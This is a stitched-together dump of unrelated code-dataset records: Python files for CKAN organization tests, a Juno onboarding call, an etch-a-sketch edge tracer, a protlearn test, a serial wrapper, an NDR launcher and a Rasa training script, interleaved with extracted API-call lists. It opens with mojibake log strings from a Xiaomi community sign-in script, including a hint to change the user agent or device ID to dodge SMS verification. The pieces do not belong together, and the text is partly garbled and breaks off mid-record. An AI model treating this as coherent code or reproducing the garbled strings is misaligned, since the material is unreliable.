format_config\n'), ((9007, 9022), 'utils.utils.w_log', 'w_log', (['"""ๅณๆณจ็จๆทๅบ้"""'], {}), "('ๅณๆณจ็จๆทๅบ้')\n", (9012, 9022), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9035, 9043), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (9040, 9043), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9428, 9452), 'utils.utils.w_log', 'w_log', (['"""้ๅบๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('้ๅบๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (9433, 9452), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9629, 9644), 'utils.utils.w_log', 'w_log', (['"""้ๅบๅๅญๅบ้"""'], {}), "('้ๅบๅๅญๅบ้')\n", (9634, 9644), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9657, 9665), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (9662, 9665), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10010, 10034), 'utils.utils.w_log', 'w_log', (['"""ๅ ๅฅๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅ ๅฅๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (10015, 10034), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10211, 10226), 'utils.utils.w_log', 'w_log', (['"""ๅ ๅฅๅๅญๅบ้"""'], {}), "('ๅ ๅฅๅๅญๅบ้')\n", (10216, 10226), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10748, 10775), 'utils.utils.w_log', 'w_log', (['"""ๅผๅงๆดป่ทๅไปปๅกๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅผๅงๆดป่ทๅไปปๅกๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (10753, 10775), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10958, 10976), 'utils.utils.w_log', 'w_log', (['"""ๅผๅงๆดป่ทๅไปปๅกๅบ้"""'], {}), "('ๅผๅงๆดป่ทๅไปปๅกๅบ้')\n", (10963, 10976), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10989, 10997), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (10994, 10997), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((11523, 11548), 'utils.utils.w_log', 'w_log', (['"""้ขๅๆดป่ทๅๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('้ขๅๆดป่ทๅๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (11528, 11548), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((11727, 11743), 'utils.utils.w_log', 'w_log', (['"""้ขๅๆดป่ทๅๅบ้"""'], {}), "('้ขๅๆดป่ทๅๅบ้')\n", (11732, 11743), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((11756, 11764), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (11761, 11764), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((12289, 12316), 'utils.utils.w_log', 'w_log', (['"""็คพๅบๆ่ๅ็ญพๅฐๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('็คพๅบๆ่ๅ็ญพๅฐๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (12294, 12316), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((12499, 12517), 'utils.utils.w_log', 'w_log', (['"""็คพๅบๆ่ๅ็ญพๅฐๅบ้"""'], {}), "('็คพๅบๆ่ๅ็ญพๅฐๅบ้')\n", (12504, 12517), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((12530, 12538), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (12535, 12538), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((15906, 15933), 'utils.utils.w_log', 'w_log', (['"""ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ็จๆทๅๆๅฏ็ ไธๆญฃ็กฎ"""'], {}), "('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ็จๆทๅๆๅฏ็ ไธๆญฃ็กฎ')\n", (15911, 15933), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16015, 16050), 'utils.utils.w_log', 'w_log', (["('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ' + r_json['desc'])"], {}), "('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ' + r_json['desc'])\n", (16020, 16050), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16131, 16164), 'utils.utils.w_log', 'w_log', (['"""ๅฝๅ่ดฆๅท้่ฆ็ญไฟก้ช่ฏ็ ๏ผ่ฏทๅฐ่ฏไฟฎๆนUAๆ่ฎพๅคID"""'], {}), "('ๅฝๅ่ดฆๅท้่ฆ็ญไฟก้ช่ฏ็ ๏ผ่ฏทๅฐ่ฏไฟฎๆนUAๆ่ฎพๅคID')\n", (16136, 16164), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16270, 16302), 'utils.utils.w_log', 'w_log', (['"""ๅฐ็ฑณ่ดฆๅท็ปๅฝๆๅ๏ผ็คพๅบ่ทๅ Cookie ๅคฑ่ดฅ"""'], {}), "('ๅฐ็ฑณ่ดฆๅท็ปๅฝๆๅ๏ผ็คพๅบ่ทๅ Cookie ๅคฑ่ดฅ')\n", (16275, 16302), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16427, 16444), 'utils.utils.w_log', 'w_log', (['"""็ปๅฝๅฐ็ฑณ่ดฆๅทๅบ้"""'], {}), "('็ปๅฝๅฐ็ฑณ่ดฆๅทๅบ้')\n", (16432, 16444), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16457, 16465), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (16462, 16465), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17060, 17076), 'utils.utils.w_log', 'w_log', (['"""ๅๆตๅ่ทๅๅคฑ่ดฅ"""'], {}), "('ๅๆตๅ่ทๅๅคฑ่ดฅ')\n", (17065, 17076), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((3224, 3235), 'time.time', 'time.time', ([], {}), '()\n', (3233, 3235), False, 'import time\n'), ((4646, 4657), 'time.time', 'time.time', ([], {}), '()\n', (4655, 4657), False, 'import time\n'), ((7512, 7536), 'utils.utils.w_log', 'w_log', (['"""่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผ้ฎๅทIDไธบ็ฉบ"""'], {}), "('่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผ้ฎๅทIDไธบ็ฉบ')\n", (7517, 7536), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n')]
|
# encoding: utf-8
from ckan import model as ckan_model
from ckan.tests import factories as ckan_factories
from ckan.tests.helpers import call_action
from ckanext.metadata import model as ckanext_model
from ckanext.metadata.tests import (
ActionTestBase,
assert_error,
factories as ckanext_factories,
assert_object_matches_dict,
)
class TestOrganizationActions(ActionTestBase):
def _generate_organization(self, **kwargs):
return ckan_factories.Organization(user=self.normal_user, **kwargs)
def _generate_metadata_collection(self, **kwargs):
return ckanext_factories.MetadataCollection(user=self.normal_user, **kwargs)
def test_create_valid(self):
input_dict = {
'name': 'test-organization',
'title': 'Test Organization',
'description': 'This is a test organization',
}
result, obj = self.test_action('organization_create', **input_dict)
assert obj.type == 'organization'
assert obj.is_organization == True
assert_object_matches_dict(obj, input_dict)
def test_delete_valid(self):
organization = self._generate_organization()
self.test_action('organization_delete',
id=organization['id'])
def test_delete_valid_cascade_metadata_schemas(self):
organization = self._generate_organization()
metadata_schema = ckanext_factories.MetadataSchema(organization_id=organization['id'])
self.test_action('organization_delete',
id=organization['id'])
assert ckanext_model.MetadataSchema.get(metadata_schema['id']).state == 'deleted'
def test_delete_valid_cascade_metadata_collections(self):
organization = self._generate_organization()
metadata_collection = self._generate_metadata_collection(organization_id=organization['id'])
self.test_action('organization_delete',
id=organization['id'])
assert ckan_model.Group.get(metadata_collection['id']).state == 'deleted'
def test_delete_with_dependencies(self):
organization = self._generate_organization()
metadata_collection = self._generate_metadata_collection(organization_id=organization['id'])
metadata_schema = ckanext_factories.MetadataSchema(organization_id=organization['id'])
metadata_record = ckanext_factories.MetadataRecord(owner_org=organization['id'],
metadata_collection_id=metadata_collection['id'])
result, obj = self.test_action('organization_delete', should_error=True,
id=organization['id'])
assert_error(result, 'message', 'Organization has dependent metadata records')
assert ckan_model.Group.get(metadata_collection['id']).state == 'active'
assert ckanext_model.MetadataSchema.get(metadata_schema['id']).state == 'active'
call_action('metadata_record_delete', id=metadata_record['id'])
self.test_action('organization_delete',
id=organization['id'])
assert ckan_model.Group.get(metadata_collection['id']).state == 'deleted'
assert ckanext_model.MetadataSchema.get(metadata_schema['id']).state == 'deleted'
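        # Dependency rule exercised above: an organization with live metadata
        # records cannot be deleted, while its collections and schemas cascade
        # to the 'deleted' state once the blocking record is removed.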
|
[
"ckanext.metadata.tests.factories.MetadataCollection",
"ckan.tests.helpers.call_action",
"ckanext.metadata.model.MetadataSchema.get",
"ckanext.metadata.tests.factories.MetadataSchema",
"ckan.model.Group.get",
"ckanext.metadata.tests.factories.MetadataRecord",
"ckanext.metadata.tests.assert_object_matches_dict",
"ckan.tests.factories.Organization",
"ckanext.metadata.tests.assert_error"
] |
[((461, 521), 'ckan.tests.factories.Organization', 'ckan_factories.Organization', ([], {'user': 'self.normal_user'}), '(user=self.normal_user, **kwargs)\n', (488, 521), True, 'from ckan.tests import factories as ckan_factories\n'), ((593, 662), 'ckanext.metadata.tests.factories.MetadataCollection', 'ckanext_factories.MetadataCollection', ([], {'user': 'self.normal_user'}), '(user=self.normal_user, **kwargs)\n', (629, 662), True, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((1040, 1083), 'ckanext.metadata.tests.assert_object_matches_dict', 'assert_object_matches_dict', (['obj', 'input_dict'], {}), '(obj, input_dict)\n', (1066, 1083), False, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((1405, 1473), 'ckanext.metadata.tests.factories.MetadataSchema', 'ckanext_factories.MetadataSchema', ([], {'organization_id': "organization['id']"}), "(organization_id=organization['id'])\n", (1437, 1473), True, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((2283, 2351), 'ckanext.metadata.tests.factories.MetadataSchema', 'ckanext_factories.MetadataSchema', ([], {'organization_id': "organization['id']"}), "(organization_id=organization['id'])\n", (2315, 2351), True, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((2378, 2494), 'ckanext.metadata.tests.factories.MetadataRecord', 'ckanext_factories.MetadataRecord', ([], {'owner_org': "organization['id']", 'metadata_collection_id': "metadata_collection['id']"}), "(owner_org=organization['id'],\n metadata_collection_id=metadata_collection['id'])\n", (2410, 2494), True, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((2702, 2780), 'ckanext.metadata.tests.assert_error', 'assert_error', (['result', '"""message"""', '"""Organization has dependent metadata records"""'], {}), "(result, 'message', 'Organization has dependent metadata records')\n", (2714, 2780), False, 'from ckanext.metadata.tests import ActionTestBase, assert_error, factories as ckanext_factories, assert_object_matches_dict\n'), ((2960, 3023), 'ckan.tests.helpers.call_action', 'call_action', (['"""metadata_record_delete"""'], {'id': "metadata_record['id']"}), "('metadata_record_delete', id=metadata_record['id'])\n", (2971, 3023), False, 'from ckan.tests.helpers import call_action\n'), ((1586, 1641), 'ckanext.metadata.model.MetadataSchema.get', 'ckanext_model.MetadataSchema.get', (["metadata_schema['id']"], {}), "(metadata_schema['id'])\n", (1618, 1641), True, 'from ckanext.metadata import model as ckanext_model\n'), ((1990, 2037), 'ckan.model.Group.get', 'ckan_model.Group.get', (["metadata_collection['id']"], {}), "(metadata_collection['id'])\n", (2010, 2037), True, 'from ckan import model as ckan_model\n'), ((2796, 2843), 'ckan.model.Group.get', 'ckan_model.Group.get', (["metadata_collection['id']"], {}), "(metadata_collection['id'])\n", (2816, 2843), True, 'from ckan import model as ckan_model\n'), ((2877, 2932), 'ckanext.metadata.model.MetadataSchema.get', 'ckanext_model.MetadataSchema.get', (["metadata_schema['id']"], {}), "(metadata_schema['id'])\n", (2909, 2932), True, 'from ckanext.metadata import model as ckanext_model\n'), ((3135, 3182), 'ckan.model.Group.get', 'ckan_model.Group.get', (["metadata_collection['id']"], {}), "(metadata_collection['id'])\n", (3155, 3182), True, 'from ckan import model as ckan_model\n'), ((3217, 3272), 'ckanext.metadata.model.MetadataSchema.get', 'ckanext_model.MetadataSchema.get', (["metadata_schema['id']"], {}), "(metadata_schema['id'])\n", (3249, 3272), True, 'from ckanext.metadata import model as ckanext_model\n')]
|
from juno.resources import handler_request
from juno.resources.routes import onboarding_routes
def account_new_onboarding_request(dictionary):
return handler_request.post(onboarding_routes.get_base_url(), dictionary)
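# Illustrative call; the payload keys are assumptions about Juno's onboarding
# API, not taken from this module:
#   account_new_onboarding_request({"type": "ONBOARDING", "emailOptOut": False})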
|
[
"juno.resources.routes.onboarding_routes.get_base_url"
] |
[((177, 209), 'juno.resources.routes.onboarding_routes.get_base_url', 'onboarding_routes.get_base_url', ([], {}), '()\n', (207, 209), False, 'from juno.resources.routes import onboarding_routes\n')]
|
import sys
import cv2
from matplotlib import pyplot as plt
from skimage.filters import sobel
import numpy as np
import math
from Etch import Etch
PRINT_ETCH = True
class Image:
def __init__(self):
self.points = []
self.image = cv2.imread("C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/tri.png", 0)
self.imageShape = 0
self.etch = Etch()
self.sourceFile = open('C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/test.txt', 'w')
self.sourceFile2 = open('C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/test2.txt', 'w')
np.set_printoptions(threshold=sys.maxsize)
def processImage(self):
self.imageShape = self.image.shape
sig = .3
median = np.median(self.image)
lower = int(max(0,(1.0-sig)*median))
upper = int(min(255,(1.0+sig)*median))
self.image = cv2.Canny(self.image,lower,upper)
plt.imshow(self.image, cmap='gray')
plt.show()
def sort(self):
#loop x
for x in range(self.imageShape[0]):
#loop y
for y in range(self.imageShape[1]):
#if there is an edge pixle
if self.image[x][y] == 255:
point = (((x -self.imageShape[1] + 1) * -1) * 18000/self.imageShape[1], y * 12000/self.imageShape[0])
self.points.append(point)
#print ("("+str(point[0]) + "," + str(point[1])+")")
print("X",end='',file = self.sourceFile)
else:
print(" ",end='',file = self.sourceFile)
print("",file = self.sourceFile)
print(len(self.points))
def drawImage(self):
avg = 0
numpoints = 0
minpoint = [0,0]
length = len(self.points)
while len(self.points) > 1:
oldmin = minpoint
min = math.pow(math.pow(18000,2) + math.pow(12000,2),.5)
minpoint = []
lessmin = []
for point in self.points:
dist = math.pow(math.pow(point[0]-oldmin[0],2) + math.pow(point[1]-oldmin[1],2),.5)
if min < dist and dist < 100:
lessmin.append(point)
if dist < min:
min = dist
minpoint = point
#if min < 3:
#break
if len(minpoint) > 0:
print(str(min) + " (" + str(minpoint[0]) + "," + str(minpoint[1]) + ")", file = self.sourceFile2)
if min > 1:
avg = avg + min
numpoints = numpoints + 1
for point in lessmin:
self.points.remove(point)
if len(minpoint) > 0:
self.points.remove(minpoint)
self.etch.goto(minpoint[0],minpoint[1],PRINT_ETCH)
if len(self.points) % 1000 == 0:
print(len(self.points))
print(str(min) + " (" + str(minpoint) + ") ",len(self.points))
print("total " + str(avg) + " " + str(numpoints))
print("total " + str(avg/numpoints))
def end(self):
self.sourceFile.close()
self.sourceFile2.close()
self.etch.goto(0,0,PRINT_ETCH)
image = Image()
#print("enter image path")
#print(input())
image.processImage()
image.sort()
image.drawImage()
image.end()
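# The drawing order produced above is a greedy nearest-neighbour walk over the
# detected edge pixels. A minimal standalone version of that idea (illustrative
# only; it omits the distance-threshold and outlier-skipping heuristics that
# drawImage applies):
def greedy_path(points):
    if not points:
        return []
    path = [points[0]]
    remaining = set(points[1:])
    while remaining:
        last = path[-1]
        # pick the closest remaining point by squared Euclidean distance
        nxt = min(remaining, key=lambda p: (p[0] - last[0]) ** 2 + (p[1] - last[1]) ** 2)
        path.append(nxt)
        remaining.remove(nxt)
    return path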
|
[
"Etch.Etch",
"cv2.Canny",
"numpy.set_printoptions",
"matplotlib.pyplot.show",
"math.pow",
"numpy.median",
"matplotlib.pyplot.imshow",
"cv2.imread"
] |
[((249, 346), 'cv2.imread', 'cv2.imread', (['"""C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/tri.png"""', '(0)'], {}), "(\n 'C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/tri.png',\n 0)\n", (259, 346), False, 'import cv2\n'), ((386, 392), 'Etch.Etch', 'Etch', ([], {}), '()\n', (390, 392), False, 'from Etch import Etch\n'), ((627, 669), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'sys.maxsize'}), '(threshold=sys.maxsize)\n', (646, 669), True, 'import numpy as np\n'), ((775, 796), 'numpy.median', 'np.median', (['self.image'], {}), '(self.image)\n', (784, 796), True, 'import numpy as np\n'), ((910, 945), 'cv2.Canny', 'cv2.Canny', (['self.image', 'lower', 'upper'], {}), '(self.image, lower, upper)\n', (919, 945), False, 'import cv2\n'), ((952, 987), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.image'], {'cmap': '"""gray"""'}), "(self.image, cmap='gray')\n", (962, 987), True, 'from matplotlib import pyplot as plt\n'), ((996, 1006), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1004, 1006), True, 'from matplotlib import pyplot as plt\n'), ((1929, 1947), 'math.pow', 'math.pow', (['(18000)', '(2)'], {}), '(18000, 2)\n', (1937, 1947), False, 'import math\n'), ((1949, 1967), 'math.pow', 'math.pow', (['(12000)', '(2)'], {}), '(12000, 2)\n', (1957, 1967), False, 'import math\n'), ((2092, 2125), 'math.pow', 'math.pow', (['(point[0] - oldmin[0])', '(2)'], {}), '(point[0] - oldmin[0], 2)\n', (2100, 2125), False, 'import math\n'), ((2125, 2158), 'math.pow', 'math.pow', (['(point[1] - oldmin[1])', '(2)'], {}), '(point[1] - oldmin[1], 2)\n', (2133, 2158), False, 'import math\n')]
|
import os
import sys
path = os.environ.get('TRAVIS_BUILD_DIR')
sys.path.insert(0, path+'/protlearn')
import numpy as np
from preprocessing import txt_to_df
from feature_engineering import aaindex1
def test_aaindex1():
"Test AAIndex1"
# load data
df = txt_to_df(path+'/tests/docs/test_seq.txt', 0)
# get aaindex1
aaind1 = aaindex1(df)
# test shape
assert aaind1.shape == (4, 553)
# test some indices
ANDN920101 = np.array([4.3, 4.40555, 4.48714, 4.46])
QIAN880126 = np.array([.01166, -.17111, .05857, -.04333])
KARS160122 = np.array([2.014, 5.48522, 2.789, 1.751])
np.testing.assert_equal(np.round(aaind1['ANDN920101'], 3),\
np.round(ANDN920101, 3))
np.testing.assert_equal(np.round(aaind1['QIAN880126'], 3),\
np.round(QIAN880126, 3))
np.testing.assert_equal(np.round(aaind1['KARS160122'], 3),\
np.round(KARS160122, 3))
# test standardization (zscore)
aaind1_z = aaindex1(df, 'zscore')
# test mean = 0
for i in range(aaind1_z.shape[0]):
assert abs(round(aaind1_z.iloc[:,1].mean())) == 0
# test std --> 1
for i in range(aaind1_z.shape[0]):
assert round(aaind1_z.iloc[:,i].std(), 1) ==\
round(aaind1_z.iloc[:,0].std(), 1)
# test standardization (minmax)
aaind1_mm = aaindex1(df, 'minmax')
# test minimum and maximum
for i in range(aaind1_mm.shape[0]):
assert round(aaind1_mm.iloc[:,i].min()) == 0
assert round(aaind1_mm.iloc[:,i].max()) == 1
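    # Properties being asserted: minmax scaling maps each column to [0, 1] via
    # (x - min) / (max - min), while zscore centres each column to mean 0 with
    # a common standard deviation.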
|
[
"preprocessing.txt_to_df",
"sys.path.insert",
"os.environ.get",
"numpy.array",
"numpy.round",
"feature_engineering.aaindex1"
] |
[((28, 62), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_BUILD_DIR"""'], {}), "('TRAVIS_BUILD_DIR')\n", (42, 62), False, 'import os\n'), ((63, 102), 'sys.path.insert', 'sys.path.insert', (['(0)', "(path + '/protlearn')"], {}), "(0, path + '/protlearn')\n", (78, 102), False, 'import sys\n'), ((271, 318), 'preprocessing.txt_to_df', 'txt_to_df', (["(path + '/tests/docs/test_seq.txt')", '(0)'], {}), "(path + '/tests/docs/test_seq.txt', 0)\n", (280, 318), False, 'from preprocessing import txt_to_df\n'), ((354, 366), 'feature_engineering.aaindex1', 'aaindex1', (['df'], {}), '(df)\n', (362, 366), False, 'from feature_engineering import aaindex1\n'), ((471, 510), 'numpy.array', 'np.array', (['[4.3, 4.40555, 4.48714, 4.46]'], {}), '([4.3, 4.40555, 4.48714, 4.46])\n', (479, 510), True, 'import numpy as np\n'), ((528, 576), 'numpy.array', 'np.array', (['[0.01166, -0.17111, 0.05857, -0.04333]'], {}), '([0.01166, -0.17111, 0.05857, -0.04333])\n', (536, 576), True, 'import numpy as np\n'), ((590, 630), 'numpy.array', 'np.array', (['[2.014, 5.48522, 2.789, 1.751]'], {}), '([2.014, 5.48522, 2.789, 1.751])\n', (598, 630), True, 'import numpy as np\n'), ((1038, 1060), 'feature_engineering.aaindex1', 'aaindex1', (['df', '"""zscore"""'], {}), "(df, 'zscore')\n", (1046, 1060), False, 'from feature_engineering import aaindex1\n'), ((1403, 1425), 'feature_engineering.aaindex1', 'aaindex1', (['df', '"""minmax"""'], {}), "(df, 'minmax')\n", (1411, 1425), False, 'from feature_engineering import aaindex1\n'), ((659, 692), 'numpy.round', 'np.round', (["aaind1['ANDN920101']", '(3)'], {}), "(aaind1['ANDN920101'], 3)\n", (667, 692), True, 'import numpy as np\n'), ((723, 746), 'numpy.round', 'np.round', (['ANDN920101', '(3)'], {}), '(ANDN920101, 3)\n', (731, 746), True, 'import numpy as np\n'), ((776, 809), 'numpy.round', 'np.round', (["aaind1['QIAN880126']", '(3)'], {}), "(aaind1['QIAN880126'], 3)\n", (784, 809), True, 'import numpy as np\n'), ((840, 863), 'numpy.round', 'np.round', (['QIAN880126', '(3)'], {}), '(QIAN880126, 3)\n', (848, 863), True, 'import numpy as np\n'), ((893, 926), 'numpy.round', 'np.round', (["aaind1['KARS160122']", '(3)'], {}), "(aaind1['KARS160122'], 3)\n", (901, 926), True, 'import numpy as np\n'), ((957, 980), 'numpy.round', 'np.round', (['KARS160122', '(3)'], {}), '(KARS160122, 3)\n', (965, 980), True, 'import numpy as np\n')]
|
import serial
from .proxy import ObjectProxy
class Connection:
current_connection = None
_settings = None
_serial = None
def __init__(self, filename, baudrate=115200, **kw):
self.filename = filename
self.baudrate = baudrate
self.kw = kw
@property
def settings(self):
if self._settings is None:
from .configuration import Settings
self._settings = Settings(self)
return self._settings
def __enter__(self):
self._serial = serial.Serial(self.filename, self.baudrate, **self.kw)
self.__class__.current_connection = self
def __exit__(self, exc_type, exc_value, traceback):
self._serial.close()
self.__class__.current_connection = None
def send(self, data):
self._serial.write(data.encode())
def readlines(self):
        data = self._serial.read(10)
        return data
connection = ObjectProxy(lambda: Connection.current_connection)
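# Usage sketch (the device path and baud rate are examples, not defaults of
# this module); the context manager opens the port on entry and closes it
# again on exit:
def demo():
    conn = Connection('/dev/ttyUSB0', baudrate=9600)
    with conn:
        conn.send('AT\r\n')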
|
[
"serial.Serial"
] |
[((532, 586), 'serial.Serial', 'serial.Serial', (['self.filename', 'self.baudrate'], {}), '(self.filename, self.baudrate, **self.kw)\n', (545, 586), False, 'import serial\n')]
|
from django import forms
class EntryForm(forms.Form):
body = forms.CharField()
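# Validation sketch (the field value is arbitrary example data):
#   form = EntryForm(data={'body': 'hello'})
#   assert form.is_valid()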
|
[
"django.forms.CharField"
] |
[((66, 83), 'django.forms.CharField', 'forms.CharField', ([], {}), '()\n', (81, 83), False, 'from django import forms\n')]
|
import os
import sys
import logging
import ipbes_ndr_analysis
LOGGER = logging.getLogger(__name__)
if __name__ == '__main__':
if len(sys.argv) != 3:
LOGGER.error(
"usage: python %s iam_token_path workspace_dir", sys.argv[0])
sys.exit(-1)
raw_iam_token_path = sys.argv[1]
raw_workspace_dir = sys.argv[2]
if not os.path.isfile(raw_iam_token_path):
        LOGGER.error(
            '%s is not a file, should be an iam token', raw_iam_token_path)
sys.exit(-1)
if os.path.isfile(raw_workspace_dir):
LOGGER.error(
'%s is supposed to be the workspace directory but points to an '
'existing file' % raw_workspace_dir)
sys.exit(-1)
ipbes_ndr_analysis.main(raw_iam_token_path, raw_workspace_dir)
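# Example invocation (the script name and both paths are placeholders):
#   python run_ndr.py ~/.tokens/iam_token.txt ./ndr_workspace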
|
[
"sys.exit",
"os.path.isfile",
"ipbes_ndr_analysis.main",
"logging.getLogger"
] |
[((77, 104), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (94, 104), False, 'import logging\n'), ((537, 570), 'os.path.isfile', 'os.path.isfile', (['raw_workspace_dir'], {}), '(raw_workspace_dir)\n', (551, 570), False, 'import os\n'), ((750, 812), 'ipbes_ndr_analysis.main', 'ipbes_ndr_analysis.main', (['raw_iam_token_path', 'raw_workspace_dir'], {}), '(raw_iam_token_path, raw_workspace_dir)\n', (773, 812), False, 'import ipbes_ndr_analysis\n'), ((272, 284), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (280, 284), False, 'import sys\n'), ((372, 406), 'os.path.isfile', 'os.path.isfile', (['raw_iam_token_path'], {}), '(raw_iam_token_path)\n', (386, 406), False, 'import os\n'), ((516, 528), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (524, 528), False, 'import sys\n'), ((732, 744), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (740, 744), False, 'import sys\n')]
|
import argparse
import glob
import os
import time
import logging
from rasa_addons.domains_merger import DomainsMerger
from rasa_addons.superagent import SuperAgent
from rasa_core.policies.memoization import MemoizationPolicy, AugmentedMemoizationPolicy
from rasa_core.policies.keras_policy import KerasPolicy
from rasa_core.agent import Agent
logger = logging.getLogger()
def concatenate_storyfiles(folder_path, prefix='stories', output='aggregated_stories.md'):
path_pattern = u'{}/{}*.md'.format(folder_path, prefix)
filenames = glob.glob(path_pattern)
with open(output, 'w') as outfile:
for fname in filenames:
with open(fname, 'r') as infile:
for line in infile:
outfile.write(line)
outfile.write("\n")
def train(stories_path, domain_path, policy_path):
root = os.path.dirname(__file__)
domain_path = os.path.join(root, domain_path)
stories_path = os.path.join(root, stories_path)
# generate_questions_data(stories_path, domain_path)
concatenate_storyfiles(stories_path, 'stories', os.path.join(stories_path, 'aggregated_stories.md'))
training_data_file = os.path.join(stories_path, 'aggregated_stories.md')
DomainsMerger(domain_path).merge().dump()
domain_path = os.path.join(domain_path, 'aggregated_domains.yaml')
from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer,
BinarySingleStateFeaturizer)
policies = [
MemoizationPolicy( max_history=3),
KerasPolicy(MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=3))
]
agent = SuperAgent(domain_path, policies=policies)
training_data = agent.load_data(training_data_file)
agent.train(training_data, epochs=200, validation_split=0.0)
agent.persist(policy_path)
logging.basicConfig(level="WARN")
def create_argparser():
parser = argparse.ArgumentParser(
description='Trains the bot.')
parser.add_argument('-s', '--stories', help="Stories path")
parser.add_argument('-d', '--domain', help="Domain path")
parser.add_argument('-p', '--policy', help="Policy path")
return parser
if __name__ == "__main__":
debug_mode = True
parser = create_argparser()
args = parser.parse_args()
start_time = time.time()
train(args.stories, args.domain, args.policy)
print("--- %s seconds ---" % (time.time() - start_time))
|
[
"rasa_core.featurizers.BinarySingleStateFeaturizer",
"argparse.ArgumentParser",
"logging.basicConfig",
"rasa_addons.superagent.SuperAgent",
"rasa_addons.domains_merger.DomainsMerger",
"os.path.dirname",
"time.time",
"glob.glob",
"rasa_core.policies.memoization.MemoizationPolicy",
"os.path.join",
"logging.getLogger"
] |
[((355, 374), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (372, 374), False, 'import logging\n'), ((544, 567), 'glob.glob', 'glob.glob', (['path_pattern'], {}), '(path_pattern)\n', (553, 567), False, 'import glob\n'), ((860, 885), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (875, 885), False, 'import os\n'), ((904, 935), 'os.path.join', 'os.path.join', (['root', 'domain_path'], {}), '(root, domain_path)\n', (916, 935), False, 'import os\n'), ((955, 987), 'os.path.join', 'os.path.join', (['root', 'stories_path'], {}), '(root, stories_path)\n', (967, 987), False, 'import os\n'), ((1175, 1226), 'os.path.join', 'os.path.join', (['stories_path', '"""aggregated_stories.md"""'], {}), "(stories_path, 'aggregated_stories.md')\n", (1187, 1226), False, 'import os\n'), ((1292, 1344), 'os.path.join', 'os.path.join', (['domain_path', '"""aggregated_domains.yaml"""'], {}), "(domain_path, 'aggregated_domains.yaml')\n", 